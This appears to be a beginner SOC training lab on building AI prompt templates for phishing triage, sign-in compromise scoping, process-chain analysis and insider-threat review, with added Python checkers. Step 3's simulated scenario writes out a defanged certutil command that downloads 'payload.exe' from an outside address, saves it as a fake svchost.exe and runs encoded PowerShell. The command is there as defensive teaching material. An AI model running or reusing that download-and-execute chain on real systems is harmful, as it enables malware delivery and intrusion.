Lab 12 (Beginner)

Build Your Investigation Prompt Library

Duration: 60-90 minutes. Modules: Module 1, Module 2

Objective

Build a reusable prompt library with 4 investigation prompt templates from Module 2. Test each prompt with a realistic scenario, evaluate the output quality, and refine the prompts based on results.

Required: Access to Claude (claude.ai or API). No SIEM access needed — you will provide scenario data as context in your prompts.


Step 1: Create the phishing triage prompt

Build a prompt that analyses email header data and provides a triage assessment:

Template structure (from Module 2):

Role: You are a SOC analyst performing phishing email triage.
Context: [Paste email headers, URLs, sender information]
Task: Analyse this email and provide:
1. Sender legitimacy assessment (SPF/DKIM/DMARC results)
2. URL reputation analysis (domain age, hosting, redirection)
3. Content indicators (urgency language, impersonation, payload type)
4. Triage recommendation: Malicious / Suspicious / Legitimate
5. Recommended response actions
Constraints: Base your assessment only on the provided data. 
Flag any analysis that requires external verification.

Test scenario: Use the following simulated email header data:

From: security-team@m1crosoft-verify.com
Reply-To: support@m1crosoft-verify.com
Subject: Urgent: Your account has been compromised
SPF: fail (sender IP 185.234.xx.xx not in SPF record)
DKIM: none
DMARC: fail
URLs in body: hxxps://m1crosoft-verify[.]com/secure/login
Domain registration: 3 days ago via Namecheap

Run your prompt with this data. Evaluate the response:
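
A useful yardstick when evaluating the model's answer is a deterministic pre-check over the same scenario data: if the code below flags the lookalike domain, the failed authentication results and the three-day-old registration, the model should have flagged them too. This is an added example, not part of the lab or the Module 2 templates; the brand watchlist, the 30-day "newly registered" threshold, the edit-distance threshold and the 3-signal verdict cut-off are assumptions chosen for illustration.

```python
"""Deterministic pre-checks over the Step 1 header block (added example, not lab code)."""
import re
from typing import Dict, List

BRANDS = ("microsoft", "office", "outlook", "paypal", "google")  # assumed brand watchlist
NEW_DOMAIN_DAYS = 30          # assumed threshold for "newly registered"
LOOKALIKE_MAX_DISTANCE = 2    # assumed edit-distance threshold for lookalike labels
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z -]*?):\s*(.*)$")

# Constructed sample: the simulated header data given in Step 1 of the lab.
SCENARIO = """\
From: security-team@m1crosoft-verify.com
Reply-To: support@m1crosoft-verify.com
Subject: Urgent: Your account has been compromised
SPF: fail (sender IP 185.234.xx.xx not in SPF record)
DKIM: none
DMARC: fail
URLs in body: hxxps://m1crosoft-verify[.]com/secure/login
Domain registration: 3 days ago via Namecheap
"""


def parse_fields(block: str) -> Dict[str, str]:
    """Map each 'Name: value' line to a lower-cased key."""
    fields: Dict[str, str] = {}
    for line in block.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1).lower()] = m.group(2).strip()
    return fields


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance, used to spot single-character brand substitutions (m1crosoft)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_brands(domain: str) -> List[str]:
    """Brands that a hyphen-separated label of the registrable domain closely imitates."""
    label_part = domain.lower().replace("[.]", ".").split(".")[0]
    hits = []
    for label in label_part.split("-"):
        for brand in BRANDS:
            if label != brand and levenshtein(label, brand) <= LOOKALIKE_MAX_DISTANCE:
                hits.append(f"{label} ~ {brand}")
    return hits


def triage_signals(block: str) -> List[str]:
    """Collect the objective indicators an analyst would expect the model to mention."""
    f = parse_fields(block)
    signals: List[str] = []
    sender_domain = f.get("from", "").rsplit("@", 1)[-1]
    signals += [f"lookalike sender domain: {h}" for h in lookalike_brands(sender_domain)]
    for proto in ("spf", "dkim", "dmarc"):
        result = (f.get(proto, "missing").split() or ["missing"])[0].lower()
        if result != "pass":
            signals.append(f"{proto.upper()} {result}")
    age = re.search(r"(\d+)\s+days?\s+ago", f.get("domain registration", ""))
    if age and int(age.group(1)) <= NEW_DOMAIN_DAYS:
        signals.append(f"domain registered {age.group(1)} days ago")
    if re.search(r"\burgent(ly)?\b", f.get("subject", ""), re.IGNORECASE):
        signals.append("urgency language in subject")
    return signals


def triage_verdict(signals: List[str]) -> str:
    """Assumed thresholds: three or more independent signals -> Malicious, one or two -> Suspicious."""
    if len(signals) >= 3:
        return "Malicious"
    return "Suspicious" if signals else "Legitimate"


if __name__ == "__main__":
    found = triage_signals(SCENARIO)
    print("\n".join(found))
    print("Verdict:", triage_verdict(found))
```

Compare the model's answer against this list: every signal here is derivable from the provided data alone, so a response that misses one is either ignoring the data or padding its answer with assumptions, which is exactly what the Constraints line tells it not to do.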


Step 2: Create the account compromise scoping prompt

Build a prompt that takes sign-in log data and assesses compromise scope:

Template:

Role: You are a SOC analyst scoping a potential account compromise.
Context: The following sign-in events were recorded for [user] 
in the past 24 hours:
[Paste sign-in log entries with timestamps, IPs, locations, 
apps, MFA results]
Task: Analyse these sign-in events and determine:
1. Which sign-ins are from the user's normal pattern?
2. Which sign-ins are anomalous? Why?
3. What is the likely attack vector (AiTM, credential stuffing, 
   token replay)?
4. What data was potentially accessed based on the applications used?
5. Recommended containment actions in priority order
Constraints: Do not assume information not present in the data.

Test with sample data:

09:00 - 192.168.1.50 (UK) - Outlook - MFA: push approved
09:15 - 192.168.1.50 (UK) - SharePoint - SSO (no MFA)
14:22 - 198.51.100.77 (NL, DigitalOcean) - Outlook Web - 
        MFA: push approved (after 6 denials)
14:25 - 198.51.100.77 (NL) - SharePoint - SSO
14:28 - 198.51.100.77 (NL) - Exchange Admin - SSO
14:35 - 192.168.1.50 (UK) - Teams - SSO

Evaluate: Did the AI correctly identify the 14:22 anomaly? Did it flag the MFA fatigue? Did it note the adversary accessing Exchange Admin?
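
The three evaluation questions above can be answered mechanically from the sample data, which gives you a baseline to hold the model's answer against. The following is an added example, not part of the lab: it parses the six events, marks sign-ins from an assumed corporate range (192.168.1.0/24) in the user's assumed home country (UK) as normal, and applies four rules (unfamiliar source, hosting-provider source, MFA push approved after repeated denials, privileged portal reached from a suspect address) plus a fifth that catches a country change within 60 minutes. The watchlists and thresholds are assumptions.

```python
"""Rule-based scoping of the Step 2 sign-in events (added example, not lab code)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

CORPORATE_NETWORKS = [ipaddress.ip_network("192.168.1.0/24")]          # assumed office range
HOME_COUNTRIES = {"UK"}                                                 # assumed from the HR profile
HOSTING_PROVIDERS = {"DigitalOcean", "AWS", "Azure", "Hetzner", "OVH"}  # assumed watchlist
PRIVILEGED_APPS = {"Exchange Admin", "Entra Admin", "Azure Portal"}     # assumed watchlist
MFA_DENIAL_THRESHOLD = 3   # assumed: this many denials before an approval = push fatigue
TRAVEL_WINDOW_MIN = 60     # assumed: country change faster than this = concurrent sessions

# Constructed sample: the Step 2 events from the lab, one event per line.
SIGNINS = """\
09:00 - 192.168.1.50 (UK) - Outlook - MFA: push approved
09:15 - 192.168.1.50 (UK) - SharePoint - SSO (no MFA)
14:22 - 198.51.100.77 (NL, DigitalOcean) - Outlook Web - MFA: push approved (after 6 denials)
14:25 - 198.51.100.77 (NL) - SharePoint - SSO
14:28 - 198.51.100.77 (NL) - Exchange Admin - SSO
14:35 - 192.168.1.50 (UK) - Teams - SSO
"""
LINE_RE = re.compile(r"^(\d\d):(\d\d) - (\S+) \(([^)]*)\) - (.+?) - (.+)$")


@dataclass
class SignIn:
    minute: int      # minutes since midnight
    ip: str
    country: str
    provider: str    # hosting-provider tag, if the log line carries one
    app: str
    auth: str

    @property
    def clock(self) -> str:
        return f"{self.minute // 60:02d}:{self.minute % 60:02d}"


def parse_signins(text: str) -> List[SignIn]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue   # skip blank or unparseable lines rather than guessing at them
        hh, mm, ip, loc, app, auth = m.groups()
        parts = [p.strip() for p in loc.split(",")]
        provider = parts[1] if len(parts) > 1 else ""
        events.append(SignIn(int(hh) * 60 + int(mm), ip, parts[0], provider, app.strip(), auth.strip()))
    return events


def is_baseline(e: SignIn) -> bool:
    """Corporate address from the user's home country counts as the normal pattern."""
    addr = ipaddress.ip_address(e.ip)
    return any(addr in net for net in CORPORATE_NETWORKS) and e.country in HOME_COUNTRIES


def scope_compromise(events: List[SignIn]) -> List[str]:
    findings: List[str] = []
    suspect_ips = set()
    prev: Optional[SignIn] = None
    for e in events:
        if not is_baseline(e):
            findings.append(f"{e.clock} sign-in from unfamiliar address {e.ip} ({e.country})")
            suspect_ips.add(e.ip)
        if e.provider in HOSTING_PROVIDERS:
            findings.append(f"{e.clock} source is a hosting provider ({e.provider}), not a user network")
        denials = re.search(r"after (\d+) denials", e.auth)
        if denials and int(denials.group(1)) >= MFA_DENIAL_THRESHOLD:
            findings.append(f"{e.clock} MFA push approved after {denials.group(1)} denials (MFA fatigue)")
        if e.app in PRIVILEGED_APPS and e.ip in suspect_ips:
            findings.append(f"{e.clock} privileged portal '{e.app}' used from suspect address {e.ip}")
        if prev and prev.country != e.country and e.minute - prev.minute < TRAVEL_WINDOW_MIN:
            findings.append(f"{e.clock} country changed {prev.country}->{e.country} in "
                            f"{e.minute - prev.minute} min (concurrent sessions)")
        prev = e
    return findings


if __name__ == "__main__":
    for line in scope_compromise(parse_signins(SIGNINS)):
        print(line)
```

Note the last rule: the 14:35 sign-in from the office seven minutes after the 14:28 Exchange Admin access from the Netherlands shows the legitimate user and the intruder active at the same time, which matters for containment (revoke sessions, do not just reset the password). A good model answer should reach the same point without being told.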


Step 3: Create the malware analysis prompt

Build a prompt for analysing process execution chains:

Template:

Role: You are a SOC analyst analysing a suspicious process chain 
from Defender for Endpoint.
Context: [Paste process tree: parent → child → grandchild with 
command lines, PIDs, timestamps, file paths]
Task: Analyse this process chain and determine:
1. Is this a legitimate process chain or potentially malicious?
2. What technique does this match (MITRE ATT&CK)?
3. What is the likely objective (download, execution, persistence, 
   lateral movement)?
4. What additional evidence should be collected?
5. Recommended response actions

Test with this scenario:

winword.exe (PID 4521)
  └─ cmd.exe (PID 8834) /c certutil -urlcache -split -f 
     hxxp://198.51.100.22/payload.exe C:\Users\Public\svchost.exe
       └─ svchost.exe (PID 9012) from C:\Users\Public\
            └─ powershell.exe -enc [Base64 string]

Step 4: Create the insider threat assessment prompt

Build a prompt that analyses user activity patterns for insider threat indicators:

Template:

Role: You are a SOC analyst reviewing user activity for potential 
insider threat indicators.
Context: The user submitted their resignation on [date]. 
The following activity was recorded in the subsequent 14 days:
[Paste: file access logs, email activity, USB events, 
print events, cloud upload events]
Task: Assess this activity and determine:
1. Which activities are within normal work patterns?
2. Which activities are anomalous for this user or timing?
3. What data types were accessed (classify by sensitivity)?
4. Risk assessment: Low / Medium / High / Critical
5. Recommended actions (technical and HR/legal coordination)
Constraints: Maintain objectivity. Not all post-resignation 
activity is malicious. Flag indicators, do not assume guilt.

Step 5: Organise your prompt library

Create a structured document with your 4 tested prompts:

#   Prompt name                 Incident type          Input required            Tested?
1   Phishing triage             Email analysis         Email headers + URLs      Yes
2   Account compromise scope    Identity compromise    Sign-in logs              Yes
3   Process chain analysis      Malware / endpoint     Process tree data         Yes
4   Insider threat assessment   Insider threat         Activity logs             Yes

Save this as your operational prompt library. You will expand it in Modules 3–5.
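
If you keep the library as code rather than a document, each template can refuse to render without its scenario data and can carry a rubric for scoring the model's answer, which makes the "Tested?" column a repeatable check instead of a tick. The following is an added example, not part of the lab: a `Prompt` dataclass holding the four Step 1 to Step 4 templates, a `render` method that fills `{placeholders}` and raises on missing inputs, and a `score` method that splits a rubric into findings the response mentioned and findings it omitted. The rubric wording and the sample model response are constructed for illustration.

```python
"""Prompt library with template rendering and rubric scoring (added example, not lab material)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Prompt:
    name: str
    incident_type: str
    role: str
    context: str                 # may hold {placeholders} that scenario data fills
    task_intro: str
    tasks: List[str]
    constraints: str = ""
    # Rubric (assumed wording): expected finding -> phrasings that count as the model reporting it
    rubric: Dict[str, List[str]] = field(default_factory=dict)

    def placeholders(self) -> List[str]:
        return re.findall(r"\{(\w+)\}", self.context)

    def render(self, **inputs: str) -> str:
        """Fill the template; refuse to produce a prompt with scenario data missing."""
        missing = [p for p in self.placeholders() if p not in inputs]
        if missing:
            raise KeyError(f"{self.name}: missing inputs {missing}")
        numbered = "\n".join(f"{i}. {t}" for i, t in enumerate(self.tasks, 1))
        parts = [f"Role: {self.role}", f"Context: {self.context.format(**inputs)}",
                 f"Task: {self.task_intro}", numbered]
        if self.constraints:
            parts.append(f"Constraints: {self.constraints}")
        return "\n".join(parts)

    def score(self, response: str) -> Tuple[List[str], List[str]]:
        """Split the rubric into findings the response mentions and findings it omits."""
        text = response.lower()
        hits = [k for k, phrases in self.rubric.items() if any(p in text for p in phrases)]
        return hits, [k for k in self.rubric if k not in hits]


LIBRARY: Dict[int, Prompt] = {
    1: Prompt("Phishing triage", "Email analysis",
              "You are a SOC analyst performing phishing email triage.",
              "{email_data}", "Analyse this email and provide:",
              ["Sender legitimacy assessment (SPF/DKIM/DMARC results)",
               "URL reputation analysis (domain age, hosting, redirection)",
               "Content indicators (urgency language, impersonation, payload type)",
               "Triage recommendation: Malicious / Suspicious / Legitimate",
               "Recommended response actions"],
              "Base your assessment only on the provided data. Flag any analysis that requires external verification.",
              {"lookalike domain": ["lookalike", "typosquat", "impersonat"],
               "authentication failure": ["spf", "dmarc"],
               "newly registered domain": ["3 days", "newly registered", "recently registered"],
               "urgency language": ["urgen"],
               "verdict": ["malicious"]}),
    2: Prompt("Account compromise scope", "Identity compromise",
              "You are a SOC analyst scoping a potential account compromise.",
              "The following sign-in events were recorded for {user} in the past 24 hours:\n{signin_logs}",
              "Analyse these sign-in events and determine:",
              ["Which sign-ins are from the user's normal pattern?", "Which sign-ins are anomalous? Why?",
               "What is the likely attack vector (AiTM, credential stuffing, token replay)?",
               "What data was potentially accessed based on the applications used?",
               "Recommended containment actions in priority order"],
              "Do not assume information not present in the data.",
              {"14:22 anomaly": ["14:22"], "mfa fatigue": ["fatigue", "denials"],
               "admin portal access": ["exchange admin"]}),
    3: Prompt("Process chain analysis", "Malware / endpoint",
              "You are a SOC analyst analysing a suspicious process chain from Defender for Endpoint.",
              "{process_tree}", "Analyse this process chain and determine:",
              ["Is this a legitimate process chain or potentially malicious?",
               "What technique does this match (MITRE ATT&CK)?",
               "What is the likely objective (download, execution, persistence, lateral movement)?",
               "What additional evidence should be collected?", "Recommended response actions"],
              rubric={"lolbin download": ["certutil"], "masquerading": ["masquerad", "svchost"]}),
    4: Prompt("Insider threat assessment", "Insider threat",
              "You are a SOC analyst reviewing user activity for potential insider threat indicators.",
              "The user submitted their resignation on {date}. The following activity was recorded "
              "in the subsequent 14 days:\n{activity_logs}", "Assess this activity and determine:",
              ["Which activities are within normal work patterns?",
               "Which activities are anomalous for this user or timing?",
               "What data types were accessed (classify by sensitivity)?",
               "Risk assessment: Low / Medium / High / Critical",
               "Recommended actions (technical and HR/legal coordination)"],
              "Maintain objectivity. Not all post-resignation activity is malicious. Flag indicators, do not assume guilt."),
}

# Constructed sample of a model response to prompt 1, used to exercise the rubric.
SAMPLE_RESPONSE = """\
1. Sender legitimacy: SPF fail, DKIM none, DMARC fail; m1crosoft-verify.com is a
   lookalike of microsoft.com, so the sender is not legitimate.
2. URL reputation: domain registered 3 days ago, same lookalike domain.
4. Triage recommendation: Malicious.
5. Block the sender domain and URL; search mailboxes for the same subject line.
"""


def evaluate_sample() -> Tuple[List[str], List[str]]:
    """Score the constructed response; it covers four rubric items and misses the urgency cue."""
    return LIBRARY[1].score(SAMPLE_RESPONSE)
```

The rubric is deliberately keyword-based: it is cheap, deterministic and good enough to catch an answer that silently drops a task (here, the content-indicator task), which is the kind of regression you want to notice when you refine a prompt and re-test it in Modules 3 to 5.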


Verification checklist